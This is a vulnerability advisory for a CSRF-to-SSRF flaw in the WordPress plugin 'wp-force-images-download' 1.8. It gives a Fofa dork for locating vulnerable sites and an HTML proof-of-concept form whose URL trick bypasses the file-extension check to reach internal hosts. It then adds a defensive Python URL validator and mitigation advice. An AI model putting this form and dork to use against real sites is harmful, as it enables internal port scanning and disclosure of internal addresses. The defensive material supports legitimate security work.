# Exploit Author : Etharus
# Vulnerability : Cross Site Request Forgery to Server Side Request Forgery
# Impact : internal ip disclosure, file extension bypass, internal port scan.
# Product Vendor : Nazakat Ali
# Version Tested : 1.8
# Date : 14/07/2023
# Fofa Dork : "/wp-content/plugins/wp-force-images-download/"

<form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php">
  <input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg">
  <br>
  <input name="new_name" type="hidden" value="">
  <button style="background: gray;" class="d-btn" id="wpfid_button" type="submit" title="Download">
    <span style="line-height: 30px;" class="wpfid_title">Download</span>
  </button>
</form>
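
A defender-side check for the `wpfid_pic_url` value, as an added example that is not part of the original advisory or the plugin's code: it is written in Python to show the validation logic rather than the plugin's PHP, and the function names and the extension and port allowlists are assumptions. It reads the extension from the URL path only, so the `?r=bypass.jpg` form in the PoC is rejected, and it refuses hosts that map to loopback, private or link-local addresses.

```python
import ipaddress
import socket
from pathlib import PurePosixPath
from urllib.parse import urlsplit

# Assumed policy values, not taken from the plugin.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
ALLOWED_PORTS = {None, 80, 443}


def resolve_host(host):
    """Return every IP the host maps to; IP literals need no DNS lookup."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
        return [ipaddress.ip_address(info[4][0]) for info in infos]


def check_image_url(url, resolver=resolve_host):
    """Return (ok, reason) for a user-supplied image URL before fetching it."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    # The extension comes from the path only; the query string is ignored.
    if PurePosixPath(parts.path).suffix.lower() not in ALLOWED_EXTENSIONS:
        return False, "path does not end in an image extension"
    try:
        addresses = resolver(parts.hostname)
    except (OSError, ValueError):
        return False, "host does not resolve"
    blocked = [str(a) for a in addresses if not a.is_global]
    if blocked or not addresses:
        return False, "non-public address: " + ", ".join(blocked)
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs; IP literals keep the demo offline.
    for sample in ("http://127.0.0.1/?r=bypass.jpg", "http://127.0.0.1/a.jpg",
                   "http://10.0.0.5:8080/x.jpg", "https://8.8.8.8/logo.png"):
        print(sample, "->", check_image_url(sample))
```

The fetch itself has to connect to the address that was checked and re-run the check on every redirect, otherwise a DNS change between check and fetch undoes it. The cross-site half of the issue needs its own fix: the handler should require an anti-CSRF token (a WordPress nonce) before acting on the POST.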